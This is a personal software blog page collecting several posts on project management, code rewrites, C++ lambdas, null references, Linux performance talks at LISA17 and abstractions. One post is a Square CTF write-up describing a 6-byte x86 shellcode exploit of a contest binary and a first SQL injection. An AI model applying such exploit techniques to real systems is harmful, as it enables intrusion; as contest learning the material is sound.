John Fremlin's blog

Toys for project management

Posted 2019-08-02 22:00:00 GMT

Project management is overhead but communication between people is essential. Just as team outings or testing are overhead but can accelerate the main activities of a group, project management done well is a massive productivity boost.

Unfortunately, while I've worked on projects with many good TPMs, there is always criticism of the project management. The complaints are always the same: everything should be in one place and somehow simple. These demands are contradictions. They are inevitably hurtful to anybody who put effort in to project manage a complex project.

The solutions proposed are always to start from scratch with a new methodology: JIRA, spreadsheet, Trello, etc. This is destructive to morale in two ways: you're telling the people who put effort into the old systems that they're not recognised, and second, demanding they toil to move everything into the new shiny toy.

Even more destructive to morale is when the new toy system inevitably captures only part of the complex project or gets unwieldy - or out of date. And then the complaint that there are multiple systems and not just one place are made true.

People only loosely involved in the project must not be allowed to destabilise it with these criticisms and any success in project management needs to be celebrated loudly. It's a tough job and the hard work of bringing up mismatched expectations, cross checking and following up is what's useful - and much more important than choosing a shiny toy.

Post a comment

Curse of business logic

Posted 2019-05-18 22:00:00 GMT

People complain that a piece of software is bogged down in technical debt and needs to be rewritten as there is business logic scattered all over it. If the rewrite goes ahead, this is then inevitably followed — in a few years — by a new set of people making the same complaint about the rewrite.

What is wrong with business software? If we follow this reasoning, it becomes messy due to contamination by filthy business logic.

That premise is convenient. We can use it to avoid thinking about the business. Unfortunately, it rejects the source of funding for the software. The reason the software was written in the first place was hopefully related to supporting the business.

Logically, then if there is anything in the business software that is not business logic, why is it there?

Your project is simple but power,Congratulations!

Posted 2019-12-03 06:56:14 GMT by Anonymous from

Post a comment

Lambdas as classes

Posted 2018-12-16 23:00:00 GMT

A class is just a closure with an arbitrary set of entry points.

A closure is a function defined inline. Commonly it's called a lambda. It may capture some values from the enclosing scope. These are stored in memory. They're laid out just as if a class or structure was defined that contained them.

In fact, many compilers will lay them out exactly the same way.

#include <iostream>
class Point 
  int x;
  int y;
  Point(int x_, int y_):x(x_),y(y_){}
  int d(int ox, int oy) 
    return (ox-x)*(ox-x)+(oy-y)*(oy-y);
void dump_mem(char const* name, int const*p) {
  std::cout << name << "\t@" << p << "\t " << p[0] << ',' << p[1] << std::endl;
int main() {
  int x=1337; int y=65537;
  Point p{x,y};
  auto d = [=](int ox,int oy) {
    return (ox-x)*(ox-x)+(oy-y)*(oy-y);
  dump_mem("class", (int*)&p);
  dump_mem("lambda", (int*)&d);

On my computer this outputs

class   @0x7ffcd00fd748  1337,65537
lambda  @0x7ffcd00fd750  1337,65537

Lambdas are like classes and vice versa.

Some languages, like C++, let you create a class that can behave like a lambda by having a default entry point. Other languages do not.

In some languages, it's inconvenient to create classes but easy to pass around lambdas. Then you can pass around collections of lambdas that touch the same bound variables, just like a class.

Beyond this trivial equivalence, it's actually useful for structuring problems. Particularly, in coding interviews where concision is very valuable and the problem is neat. It lets you close over multiple variables and not pass them to every function.

Here is an example of a solution to the small problem for this excellent Google Codejam Kickstart question. We obtain the concision of global variables, without the downside of singleton global state.

#include <iostream>
#include <vector>
#include <cstdlib>
#include <limits>
#include <cassert>
using namespace std;
struct MaxSweetness {
// problem defined inputs
  long N, O, D;
  long X1, X2, A, B, C, M, L;
  vector<long> S;
// solution state variables
  long best_so_far;
  bool found_any;
  long sweetness;
  long odds;
  auto& read(std::istream&is) {
    is >> N >> O  >> D
       >> X1 >> X2 >> A >> B >> C >> M >> L;
    return *this;
  auto& build_sweetness() {
    unsigned j=0;
    long X_1 = X2;
    long X_2 = X1;
    S[j++] = X1 + L;
    S[j++] = X2 + L;
    for (; j < S.size(); ++j) {
      long X_0 = (A * X_1 + B * X_2 + C)%M;
      X_2 = X_1;
      X_1 = X_0;
      S[j] = X_0 + L;
    return *this;
  void add_candy(long index) {
    auto val = S[index];
    odds += abs(val) % 2;
    sweetness += val;
  // can Supervin eat more candy?
  bool unlimited() {
    return odds <= O && sweetness <= D;
  void check_sweetness() 
    if (unlimited()) {
      best_so_far = max(best_so_far, sweetness);
      found_any = true;
  void del_candy(long index) {
    auto val = S[index];
    odds -= abs(val) % 2;
    sweetness -= val;
  auto& best() {
    best_so_far = numeric_limits<long>::lowest();
    found_any = false;
    sweetness = 0;
    odds = 0;
    long left = 0;
    long right = 0;
    while (left < N) {
      while (unlimited() && right < N) {
      if (left < right) {
      if (right > left) {
    return *this;
int main() {
  int T;
  cin >> T;
  for (int c = 1; c <= T; ++c) {
    auto solved = MaxSweetness()
    cout << "Case #" << c << ": ";
    if (solved.found_any)
      cout << solved.best_so_far;
      cout << "IMPOSSIBLE";  
    cout << endl;
Notice how this allows to have short lines, and easily move logic into helper functions.

In an interview where time is at a premium this means you can structure code to impress without having to remember to pass a long list of arguments.

Not only does this reduce verbose, error prone code passing repetitive parameters, it greatly reduces the costs of modifying that code to add another parameter. Instead of having to thread the new parameter through a complex chain of nested calls, the value is accessible everywhere.

It's particularly handy for recursive calls where some state needs to be transmitted. The state can be made implicit in the this parameter. Of course, it doesn't work for everything. Having the code for a big project in one file becomes unwieldy and it's hard to understand what affects what. Use this tool appropriately!

Post a comment

The Rewrite Fallacy

Posted 2018-04-28 22:00:00 GMT

Software developers love to criticise working code, say it is all very bad, and should be rewritten. It's generally possible to discourage the junior engineers who try this tactic by pointing out how big a project it would be. But some very experienced ones are looking for a big project, know that the rewrite might have few customer facing improvements, is likely to fail and come in over-budget and late, and still propose it. They claim that this time, it will be different. Why?

The upfront costs of understanding an old, working system are high and visible progress is low. The immediate visible productivity of a rewrite is high. There is the opportunity to output grand sounding designs and lots of code. Therefore the engineer will likely benefit from an unnecessary rewrite and appear productive doing it.

Unfortunately, the cost of understanding the problem domain will be borne. This will take time. Typically, there is a built in expectation that a project will be later than estimated — so paying this cost towards the end makes sense for the engineer.

The development time before the rewrite starts to benchmark itself against the prior system will look falsely productive. To counter this, as soon as possible, the design and implementation of components of the new system should be validated against production. The new systems should immediately take over responsibility as they are built, or in some way have the workload be mirrored into them, to close this window of false productivity.

Will the rewrite be a net improvement? Unless the team is very familiar with the old system, there is little reason to believe this. In fact, as the old system is working and the new one is not, at least at the moment of deciding to fund the project, then objectively the new system must be worse to start with. Hopefully, it will improve to be better over time.

Hope is a huge benefit of a rewrite. Allowing a rewrite can greatly improve morale. The blessing of this optimism has to be balanced with the curse of optimistically ignoring problems.

Rewrites are controversial and often opposed by people with responsibility for outcomes because they are a way for weak engineers to make a land grab and claim they did a good job with no accountability. Given this context, engineers might be reasonably worried about revealing issues until so much cost has been sunk that issues will not be used to cancel the project. A typical tactic for this is to claim that nothing can be measured until the whole system is built and to refuse to make even small changes to the old system, which would greatly improve matters but make the rewrite less urgent.

In my experience, a small amount of imagination and a little work is enough to run in parallel with the old system. This work is likely to be resisted but it will reduce risk and most importantly will focus efforts and align people around tangible outcomes.

It's important to set the expectation that success will not be immediate, and balance the benefits of the hope with concrete measured progress. In the best case, the confidence and ownership gained from a rewrite can outweigh the costs — it's an investment in an engineering team's level of engagement.


Posted 2018-08-25 11:41:20 GMT by Anonymous from

Post a comment

How B players hire C players

Posted 2018-03-18 23:00:00 GMT

Jack Welch, GE CEO popularized segmenting workers into letter groups: A players (top 20%), B players (70%) and C players (bottom 10%). Steve Jobs is popularly quoted, A players hire A players; B players hire C players; and C players hire D players. It doesn't take long to get to Z players. This trickle-down effect causes bozo explosions in companies.

I've been on interview loops for hundreds of candidates at companies that claim to want to hire the best. Out of those hundreds of interviews a few really outstanding candidates come up. We manage to get them rarely. If our aim is to hire the best, why do we often fail?

Often, an interviewer will have a negative reaction to the candidate, leaving feedback like aced the interview but don't want to work with them. This makes it difficult to justify a strong effort to hire. Once, I was on a loop with a superstar candidate. I and several others noted that. One of the other interviewers was a famous figure in an academic branch of engineering. The interviewee argued with the famous figure. It seemed to me that the candidate was probably right but the interviewer was so offended we couldn't extend an offer.

For nearly every firm, there are people who are much better and much worse for the job than those working there. The quote about A players hiring A players is justified with the idea that somehow people at the top won't mind hiring people better than them — as they might be more confident and willing to embrace challenging points of view. I don't think that's always true as the example above suggests.

A thought experiment that I've found useful is to imagine how a superstar candidate would experience the interview. I liked to bring this up when training interviewers. The questions would be super easy and interviewers themselves would make basic mistakes. How could such a candidate communicate in a way that did not appear arrogant?

Well I found out. I once interviewed such a senior candidate. I was asking a systems design question. The candidate would easily complete designs based on my suggestions but was cautious about suggesting anything himself. It was a little confusing as he was obviously very capable and knew how to design for all the different trade-offs I could think up. I felt I was missing something and gave him very positive feedback. The other feedback showed him acing the coding interviews. This superstar wasn't dinged for arrogance — he'd carefully avoided mentioning mistakes made by the interviewers. Unfortunately, he wasn't enthusiastic about joining our company — understandably. He would have been working with people much less capable.

This is a hard reality to reconcile with wanting to hire the best. People better than you might not want to work with you. Much more comfortable to hire those who do — but the benefits of a little humility can be extraordinary!

Post a comment

Nothing was a billion dollar mistake

Posted 2018-01-19 23:00:00 GMT

Tony Hoare, inventor of quicksort and many other foundational computer science concepts, claimed a billion-dollar mistake. It was the invention of the null reference in 1965. The special value of zero is used to indicate that a reference points nowhere. This is very efficient. But it's not a mistake. The mistake is to try to ban missing values. They often really are missing!

Java programmers particularly are afflicted by the NullPointerException, with millions of hits for this on Google. They abbreviate it to NPE, and bemoan it. They'll actually check whether they would throw it and then throw another exception instead — though Java code that distinguishes exception types is rare.

At a superficial level, the null pointer exception is the result of a mismatch of expectations: someone wrote some code that wanted a value, and someone called that code without giving it the value. Without looking deeper, an immediate obvious response is to systematically try to annotate or check that the values are really there when they are required.

The default behaviour in Objective C on SQL usually makes more sense to the output of the program, especially programs which should not crash, where null (or nil) just combines to form another null. Still, missing values disrupt the normal computation and thinking harder about what to do is often worth it.

There have been countless quixotic attempts to avoid this hard thinking: to ban null, to make complicated ways to declare that things are not nullable, and define away nullness. There is a pedantic tendency to try to harness punctuation elements like ? or define Option types — to try to force people to spend effort to admit that a value could be missing.

This is missing the point in the missing values: the hard problem isn't when someone is deliberately, maliciously trying to withhold information from the code they're calling. Instead, it's when they just don't have the information and are passing down what they have. The systematic response should generally not be to insist and demand the information. This would be convenient and make it very easy for one party in the exchange, as now we can write the code without figuring out what to do when there is incomplete information.

Unfortunately, incomplete information is the default state of the world. If the programmer won't deal with it, then the poor users of the program will have to, by entering bogus values. It's better to unambiguously indicate that something is missing rather than demand a lie!

Thousands of immigrants to the US have an invented first name, which is very inconvenient for them, because systems are set up to discourage a missing name: they are called Fnu. This is a bureaucratic consequence of a non-null annotation. It is used as an acronym for First Name Unknown, and in a bizarre twist of fate, for people who only have a first name — as their first name, so the last name is not null.

In the real world, incomplete information is the default. A convenient unambiguous representation is the null pointer, which doesn't take up space in terms of its binary representation or syntax — unlike the verbose imposition of Option types as in Haskell.

Incomplete information is the default with computers too. We need to learn to accept that. Recent language standardizations try to pretend it's not the case, forcing painful complexity on users.

The C++ variant, a type-safe union which was proposed in the last few years misses this lesson. In an opinionated attempt to ban null, there is no by default empty value for a variant. But a variant can be empty, they call it valueless_by_exception() and so code has to deal with it. This paradox afflicts non-nullable ! class fields in Kotlin too, which can be null before they're initialized. Requiring a null-check on something marked non-nullable is just silly.

Let's accept that information is incomplete, and be kinder when that's the case!

Post a comment

Freeing space from open files on UN*X when deleting doesn't work

Posted 2017-12-29 23:00:00 GMT

Your disk is filling up, you run du | sort -n | less and identify the culprit, then rm -f. But df tells you that the disk space is still used.

According to POSIX, the removal of the file contents shall be postponed until all references to the file are closed. A program must have the file open. Obviously, an easy way out is to kill all the programs using it, but sometimes you can't kill the program because it's doing something useful. First find which it is with lsof -nP +L1.

That tells you the pid and fd numbers. The file could actually be opened in multiple ways! However, you only need to truncate it once - by running : | sudo tee /proc/$pid/fd/$fd for one of these pairs.

Note that if the file is mmap'd the process might get SIGBUS. If it's just a logfile, this is unlikely!

Some people choose to first truncate before deleting logfiles to avoid chasing through this, i.e. : > $file; rm $file.

Post a comment

LISA17 conference notes

Posted 2017-11-01 23:00:00 GMT

I attended the LISA17 conference in San Francisco. Here are some very rough and opinionated notes from talks that interested me. If I made any mistakes let me know and please comment on the things I missed!

Ted Ts'o: Linux performance tuning

This tutorial was exceptional because the speaker has years of experience as one of the top Linux developers. Ted uses emacs!

Goals of performance tuning

  • improve throughput
  • manage and understand performance cliff

Investigate bottlenecks with rigorous scientific method: change one parameter at a time. Take lots of notes and make haste slowly. Measurement tools can impact behaviour of the observed application.

Basic tools to start with

  • Memory: free -m. Adding memory might be the easiest way to speed up the machine.
  • Tasks: top. What are the CPUs doing or waiting for?
  • IO: iostat -x -k 5. This shows average queue size (avgqu-sz) for requests and merging statistics - crucial for understanding performance given larger requests are much more efficient.

Example filesystem benchmark: fs_mark -s 10240 -n 1000 -d /mnt - creates 1000 files each 10kB in /mnt and does fsync after each. Can be greatly improved by relaxing sync guarantees. Use the exact benchmark for your application!

Cache flush commands are ridiculously expensive. Google runs in production with journal disabled, as it is so much faster and there is a higher level consistency guaranteed by multi-machine replication. This cross-machine cluster file-system also means RAID is unnecessary.

Ted Ts'o made this snap script for low impact performance monitoring extraction from production systems.


In terms of selecting hardware: note seek time is complicated and should typically be reported statistically - worst case and average. Low number offsets LBA at the outer diameter of the disk can be much faster to seek. Therefore you can put your most used partitions at the first offsets of the disk to get a lot more performance - this is called short-stroking and can be a cheap way to get more performance. Filesystem software moves slowly as it has to be reliable and hardware generally moves much faster.

HDDs at 15000rpm run at hot temperatures and use a lot of power; many applications that used those have moved to SSDs. SSDs can also use a lot of power. They tend to fail on write. Random writes can be very slow - 0.5s average, 2s worst case for 4k random writes. You can wear out an SSD by writing a lot. See Disks for Data Centers in terms of advice about selecting hardware (Ted wrote this). Think about how to use iops across the fleet (hot and cold storage). The interface SATA 1.5Gbps or 3Gbps or PCIe may not be important given that e.g. random writes are slow. RAID does not make sense generally in today's world (at Google scale) and can suffer from read/modify/write cycles.

We can think about application specific file-systems, now we have containers. For example, ReiserFS is good for small files, XFS good for big RAID arrays and large files. Ext4 is not optimized for RAID.

Consider increasing journal size for small writes. Note Google disables the journal altogether.

Recommends Brendan Gregg's perf tools using ftrace. These were introduced at LISA 14

  • iosnoop - friendly blktrace
  • bitesize - distribution of IO sizes
  • opensnoop - file opens
  • iolatency
Also more advanced versions with lower overhead due to computing aggregates in kernel using eBPF, the BPF Compiler Collection (BCC): biosnoop, bitesize, biolatency, opensnoop.

Consider the multiqueue scheduler for very fast storage devices like NVMe.

Network tuning

Immediately check for trivial basic health: ethtool, ifconfig, ping, nttcp. Check for various off-load functions and that the advanced capabilities of the card are used.

Consider whether you want latency or throughput. Optimize the bandwidth delay product. Then remember that increasing window size takes memory; this can be tuned with net.core.rmem_max and net.core.wmem_max. Use nttcp to reduce buffer sizes as much as possible to avoid bufferbloat.

UDP might be a better bet.

However, we can push TCP to be low latency. Disable Nagle with setsockopt TCP_NODELAY. Enable TCP_QUICKACK to disable delayed acknowledgments.

NFS performance tuning

Recommends considering an NFS appliance, e.g. NetApp.

Some tricks: use no_subtree_check. Bump up nfs threads to 128. Try to separate network and disk IO to different PCI buses - no longer necessarily relevant with PCIe. Make sure to use NFSv3 and increase rsize/wsize. Mount options: rw,intr. Make sure to tune for throughput, large mtu and jumbo frames.

NFSv4: only use NFSv4.1 on Linux 4+, see ;login magazine, June 2015.

Memory tuning

If there is any swapping, first, try adding more memory. Add more and faster swap devices.

Paging will happen. majflts/s is rate of faults that result in IO. pgsteal/s is rate of recycling of page cache pages.

Try sar -W 3 and periodically send sysreq-m.

Note the memory hierarchy is important as closer caches are much faster.

Translation Lookaside Buffer (TLB) caches translation from virtual address to physical address. Can avoid up to six layers of lookup on 64-bit system - costing thousands of cycles. There are only 32 or 64 entries in the TLB in a modern system.

The jiffies rate can greatly affect TLB thrashing by controlling rate of task switches. Hugepages avoid consuming these entries. Kernel modules burn TLB entries while the originally loaded kernel does not.

The perf tool can show TLB and cache statistics.

Application tuning

Experimentation with eBPF.

For JVM consider GC and JIT. Size the heap.

Tools: strace, ltrace, valgrind, gprof, oprofile, perf (like truss, ktruss). Purify might not be as good as valgrind.

perf is the new hotness. Minimal overhead, should be safe in production from a performance perspective. However, the advanced introspection capabilities may be undesirable for security.

There are many interesting extensions - like the ext4slower program which shows all operations on ext4 that take longer than 10ms.

Userspace locking: make sure to use futex(2).

Consider CPU affinity.

Latency numbers that all programmers should know. Note this does not include random write for an SSD because that depends on a great many factors.


It's more addictive than pistachios!

It's time to shoot the engineer and put the darn thing into production.

Great way of learning about the whole stack!

Robert Ballance: Automating System Data Analysis Using R

This talk presented a valuable philosophy and attitude: that we should consider making repeatable re-usable reports. This goes against the grain of expectations around reporting which often frame reports as one-off tasks. The examples were very compelling.

Some background: R was written at Bell Labs by statisticians who were very familiar with UN*X. Data is dirty. The computations and software for data analysis should be trustworthy: they should do what they claim, and be seen to do so.

I've spent my entire career getting rid of spreadsheets.

Very rapid growth in CRAN R packages. Pipe operator %>%.

Used dplyr. Small repeatable pipelines for reports that can be reused. Very pretty code examples using dplyr and ggplot and the aforementioned pipe operators.

Renee Lung: Testing Before You Scale & Making Friends While You Do It

Your customers shouldn’t find problems before you do.

Onboarding a big new account with an expected 20k incidents per day, around 7M per year.

They wanted to test the load. The only thing that behaves like prod, is prod.

Chaos Engineering is about experiments in realistic conditions. PagerDuty has Failure Friday - where they expose systems to controlled experiments.

Balance business and engineering.

Decided to create a tool to simulate load.

Noticeable customer impact from first and second test but they still persisted which was quite brave. The talk was very honest about the interpersonal and organisational issues that the project faced.

Tried to explain why the staging environment is different from production to an idealistic questioner.

Baron Schwartz: Scalability Is Quantifiable: The Universal Scalability Law

Eben Freeman's talk on queuing is really good!

Recommends a talk by Rasmussen on failure boundaries.

Failure boundary is nonlinear.

Hard to apply queuing theory to the real world of capacity and ops, as difficult to figure out how much time is spent queuing in real systems.

Add a crosstalk (coherence) penalty with a coefficient k as a quadratic term to the denominator in Amdahl's law. The penalty represents the cost of communication.

Defines load as concurrency.

Suggests that load-tests should try to fit the crosstalk penalty and Amdahl's law parameters. Claims that this fits quite well to many real world scaling problems with some abstract examples.

Chastity Blackwell: The 7 Deadly Sins of Documentation

Without effort, documentation will be scattered across multiple systems and notes that the costs are paid in ramping up new people. We should invest in documentation.

Blake Bisset; Jonah Horowitz: Persistent SRE Antipatterns: Pitfalls on the Road to Creating a Successful SRE Program Like Netflix and Google

SRE is not a rebranded ops, should not try to build an NOC.

Sasha Goldshtein: Fast and Safe Production Monitoring of JVM Applications with BPF Magic

Beyond performance, we can trace things like system calls to find out where something is happening - for example, the stacktrace of the code that is printing a message.

The JVM can cooperate by adding more tracepoints -XX:+ExtendedDTraceProbes.

The advantage of BPF as opposed to perf, is that BPF can filter and aggregate events in the kernel, which can make things much faster than perf, which just transmits events. BPF can calculate histograms and so on.

Needs recent kernels - 4.9 kernel for the perf_events attaching.

DB performance tracing

Many performance investigations can occur now without modifying any programs. For example, there are instrumentation scripts like dbslower that can print out which queries in MySQL and can be extended to other databases.

We can trace and find out the exact stacktrace where a query is printed.

GC performance tracing

Can trace GC: ustat tool and object creation with uobjnew.

Trace open file failures

Use opensnoop to find failed open syscalls. Then attach a trace for that specific error to a Java application.

Michael Jennings: Charliecloud: Unprivileged Containers for User-Defined Software Stacks in HPC

Want to make it possible for people to bring their own software stack to run on the supercomputers at Los Alamos, and decided to explore containers. Unlike virtual machines, they do not have performance impact on storage or networking (Infiniband).

Recommends this LWN article: Namespaces in operation.

Docker with OverylayFS can be slow on HPC. Therefore they built a system called Charliecloud with minimal performance impact, and native file-system performance.

Matt Cutts and Raquel Romano: Stories from the Trenches of Government Technology

Sometimes don't have source code or access to logs.

Many basic problems: 5% of veterans incorrectly denied healthcare benefits from a single simple bug.

Great value delivered by bug bounty programs.

API first!

Meaningful contribution - hugely impactful, bipartisan problems. Looking for software engineers and site reliability engineers for short tours of duty.

Jake Pittis: Resiliency Testing with Toxiproxy

CEO at Shopify once turned off a server as a manual chaos monkey.

Continued to work on resiliency, with gamedays. Then thought about automating the game days to ensure that issues remain fixed and don't regress.

Want to maintain authenticity.

ToxiProxy interposes latency, blackholing, and rejecting connections in the production systems and then is supported by automated testing in Ruby that asserts behaviour about the system.

Incident post-mortem fixes are checked and verified by injecting the faults again and checking application specific consequences. This confirms that fixes worked, and continue to work in the future.

Resiliency Matrix declares expected dependency between runtime systems. ToxiProxy tests allow one to validate that the dependency matrix truely reflects the production reality.

Brendan Gregg: Linux Container Performance Analysis

Common system performance tools like perf do not work well in containers, as the pid and filesystem namespaces are different. System wide statistics (e.g. for free memory) are published to containers which causes programs to make wrong assumptions: for example, Java does not understand how much memory is actually available in the container.

The situation is improving and there is ongoing integration of support for monitoring performance of containerized applications.

Understanding which limit is hit in the case of CPU containerization can be very confusing as there are many different limits.

PS. Brendan's talk from last year at LISA16 gives a general introduction to the advanced bpf tools: LISA16: Linux 4.X Tracing Tools: Using BPF Superpowers

Teddy Reed and Mitchell Grenier: osquery—Windows, macOS, Linux Monitoring and Intrusion Detection

Labs showing how to collect and query many system level properties like running processes from a distributed set of systems with a tool called osquery.

It can collect current state and also buffer logs of changes.

Heather Osborn: Vax to K8s: Ticketmaster's Transformation to Cloud Native Devops

Tech Maturity model.

20k on-prem VMs.

Kevin Barron: Coherent Communications—What We Can Learn from Theoretical Physics

Human communications take a lot of time and we need to be careful that we're really communicating.

Evan Gilman and Doug Barth: Clarifying Zero Trust: The Model, the Philosophy, the Ethos

Establish some strong properties: that all flows are authenticated and encrypted.

No trust in the network. Automation based policy based on a Ruby DSL and Chef that reconfigures iptables rules to add IPSec routes between application tiers.

Related to Google's BeyondCorp.

Beyond the control aspects, another value of the approach is observability. Mentioned that another way of doing this is Lyft Envoy.

Mostly build your own still.

Brian Pitts: Capacity and Stability Patterns

Very thoughtful talk with a comprehensive coverage of various techniques.

EventBrite has 150M ticket sales per year. Very spiky traffic. Over one minute can quadruple.

Bulkheads: partition systems to prevent cascading failures.

Canary testing: gradual rollout of new applications.

Graceful degradation.

Rate limiting. Understand capacity and control amount of work you accept.

Timeouts. Even have to timeout payment processors.


Capacity planning.

Corey Quinn: "Don't You Know Who I Am?!" The Danger of Celebrity in Tech

High energy and well presented talk.

Netflix: developers have root in production.

Should not be cargo-culted to places without same culture of trust and top quality talent.

Be careful about punching down. Recognise the weight that your words carry coming from a successful company with specific constraints.

Culture of security conferences is toxic.

Ben Hartshorne: Sample Your Traffic but Keep the Good Stuff!

Adapt sample rate as you're watching your traffic, to scale observability infrastructure logarithmically with production. Sample rate should be recorded in event, and reduced in proportion to traffic.

Honeycomb does this with honeytail. Another alternative is Uber's opentracing: Jaeger which uses a consistent sampler.

Mohit Suley: Debugging @ Scale

Distributed tracing is the new debugger.

Use Twitter's anomaly detection R library.

Jon Kuroda: System Crash, Plane Crash: Lessons from Commercial Aviation and Other Engineering Fields

Need to better at following checklists, sterile cockpit rule (kicking out unqualified people). Avoid normalization of deviance. Lots to learn from airline industry!

Think about telemetry.

Post a comment

Square CTF 2017 Grace Hopper

Posted 2017-10-18 22:00:00 GMT

Square put on a great competition this year at the Grace Hopper conference. My girlfriend was attending and had solved a lot of the challenges but some of the high pointers were left.


The 6yte challenge hooked me. The task was to exploit an x86 32-bit Linux binary to print a file to the console - in only 6-bytes of machine code. Most opcodes on x86 are at least two bytes, so this means using at most three instructions. A tight budget!

The 6yte program was pretty simple. It memory mapped an executable region then decoded its command line argument as a hex string into this region, then jumped to it. It also printed out the addresses the program was loaded in.

On one side, this is much easier than exploiting a typical application nowadays, which probably marks writable memory non-executable. On the other hand, the 6yte program calls alarm() so that if you pause in the debugger, it will just crash, and it also uses sleep() to delay, so you can't immediately just try tons of things at random. These countermeasures made the contest much more fun for me.

I spent quite a while being misled by the printing of the program addresses into thinking I should use that. I wanted to call the puts function that is used elsewhere in the program to print out the string. In the process I learnt a lot about the Procedure Load Table. Trying to compute the relative address and then generate the right relative jump confused me. My plan was to spend one byte pushing edi onto the stack, and then five bytes jumping to puts(), or try to push the address of puts() onto the stack then jump to it, or something along those lines, but I just couldn't squeeze it into the remaining five bytes. Time to look more closely at the problem!

The disassembly for the jump to the decoded shellcode first loaded the target string into eax and then put it in edi

0x80488d2:   8d 85 68 ff ff ff               	lea eax, dword [ ebp +0xffffff68 ]
0x80488d8:   89 c7                           	mov edi, eax

Then we were given some handy register values. Comparing to Linux system call numbers, 4 is very helpful because it means write, and STDOUT_FILENO is 1. We are all set up to make a syscall!

0x80488da:   ba 05 00 00 00                  	mov edx, 0x5
0x80488df:   bb 01 00 00 00                  	mov ebx, 0x1
0x80488e4:   b8 04 00 00 00                  	mov eax, 0x4
0x80488e9:   ff 65 e8                        	jmp dword [ ebp + 0xffffffe8 ]

To execute the system call we need just two bytes cd80, but first we need to mov edi to ecx (with 89f9). This will unfortunately only print the first 5 bytes, as defined in edx, but we have two bytes of instructions left. I tried several ideas for increasing edx, like adding it to itself it and shifting it and so on, but then remembered the wonderful lea instruction on x86. This oddly named instruction doesn't actually access memory. It combines a mov, and a shift add - a limited multiply accumulate.

To find out opcodes, I was grepping objdump --source /lib32/ that has a good sample of opcodes. A shortcut to avoid having to run an assembler. I discovered that ecx <- edi + xx is 8d4f05xx. This costs four bytes, and then the last two can be used to do the int 0x80 syscall. Not the neatest solution (Cong Wang has a much better one) but it let me read out the flag :)

By now I was pretty enthused with the competition - it was my first time crafting an exploit!

Needle in the Haystack

The next problem I tried was the Needle in the Haystack forensics challenge. Many years ago I implemented a vfat filesystem and fsck program, so I was very happy to see that it had a FAT12 filesystem. Inside was a Ruby on Rails project. There were some developer passwords in it which I immediately put into the submission box for the challenge - and was punished with a RickRoll. That teasing riled me and though it was late on Thursday night after my floundering around on the previous problem, my motivation redoubled.

It took me a while to realise that there was nothing in the Ruby on Rails project. I compared it against the base skeleton created by the Rails setup by default. This was my first CTF, I didn't know the conventions. I wasn't sure how much work was expected and what to focus on.

I tried a bunch of data recovery programs to dig out deleted files from the filesystem image, and found a tarball containing a git repository. I checked out all revisions in all branches, some of which were very temptingly labeled, but there didn't seem to be anything in it, so I tried a bunch more undeletion programs, and then switched to solve smaller challenges.

This gave me more idea of the conventions used in the competition. Reading the rubric for the haystack challenge I noticed it mentioned the word blob: that meant the git repo was the right track: and git fsck --lost-found gave up the answer.

This ended up being my favourite problem because it combined so many technologies (Ruby on Rails, FAT, git) and tantalized with apparent victory at multiple steps.


Other questions were also fun. I really enjoyed the SQL challenge - my first time doing a SQL injection, for which the SQLite function GROUP_CONCAT was very helpful. Then I found out that there was an easier version of 6yte without the bytes limit. Dammit!!

Now it was super late at night but team chocolates was #2 on the leaderboard. The challenges had all been so much fun and the VMs and setup for each were super well done, so I was very enthusiastic and feeling very hungry for the #1 spot. The next morning I was very excited as I thought the competition would end on that Friday (Alok eventually explained to me that we had an extra week) and I ran round to round up people to help. I didn't want to lose and was wondering about getting IDA Pro to solve the floppy challenge. Turns out Zach and Trammell were the right choices and chocolates got to #1 while I slept.


The contest was a ton of fun. It was my first time attempting shellcode and first time doing SQL injection. It makes me really appreciate the value of having a library of tools in security research. The field has developed its own culture, experts and can seem impenetrable (pun!). This CTF made it accessible to me in a way I never anticipated.

I learnt new techniques: about instruction coding, dynamic linking, and about process from Trammell. He showed me how to connect qemu in debug mode and Hopper. The way he approached the problem was very different to my unskilled initial expectations: I thought of trying to extract the logic into a sandbox and would have been tripped up on all the countermeasures in the code, whereas Trammell's confident holistic reverse engineering quickly neutralised them.

In terms of the mechanics, the contest framework, with VMs being spun up, was ambitious and worked perfectly. On a non-technical level, the jokes and teasing with RickRolls and countermeasures made the challenges personal. Solving the problems was joyous. It left me very impressed with the culture at Square, that visibly invested so much. The contest was run really well with great responsiveness on Slack, and I'd love to do more CTFs. Thanks Square!

Post a comment

Zero value abstractions

Posted 2017-10-06 22:00:00 GMT

The Rust and C++ communities have embraced the idea of abstractions without runtime overhead. Object orientated programming encourages the idea of dynamic dispatch - at run-time choosing what to do based on the type. This is costly: a small cost as a decision has to be made at runtime and a potentially very expensive consequence: the compiler can't inline and propagate constants. However, it allows code to be written once which works with many types. So called zero cost abstractions avoid this by having the compiler figure out the specific concrete implementation behind the abstraction and then perform its optimizations with this information.

Runtime cost is actually only part of the cost of an abstraction. Even if there is no runtime cost, abstractions must provide value as they have other costs. An abstraction introduces a new concept and imposes a mental burden on the people working with it. In the ideal case, the abstraction is perfectly aligned with the problem domain: for example, it's often very convenient to be able to show something on the screen and get its dimensions independently of whether it is a photo or a video — abstracting over the difference reduces the amount of code written, and makes it clear that the code doesn't care about those details. This may actually be good for people debugging and reading the code.

Abstractions defined in the wrong way can make it hard to modify code: by muddling together unrelated things, by hiding useful details, increasing compile times, or just by confusing people and taking up mental space. These costs are less easy to measure than the runtime cost. However, they can be much more expensive. Debugging code from a stagnant project, where the build environment isn't readily available, is vastly harder when there are layers of abstraction. Abstractions obscure the answer to the question: what does this code actually do?

Weak engineers can try to abstract away the parts of the project they don't know how to accomplish. No value is being added there. Another abuse is in wrapping existing code and interfaces belonging to another project or group: this sort of wrapping layer is very easy to write and gives an illusion of productivity, but means that the people who own the code will now have to understand a wrapper in order to help.

It's fun to reduce runtime costs. However, given the other costs are normally more significant, it's important to think of the value that the abstraction brings. An abstraction needs to be valuable even if there are no runtime costs. How much does it really help?

The worst abstractions abstract nothing, and provide no value: most commonly, a grand interface with a single implementation. They impose a cost on all readers — slogging through meaningless code, and slow people debugging production issues, who eventually have to understand that the interface is a mask for the real underlying implementation. Abstractions are costly. When reviewing or writing code, remember abstractions must provide value.

Post a comment

Older entries (109 remaining)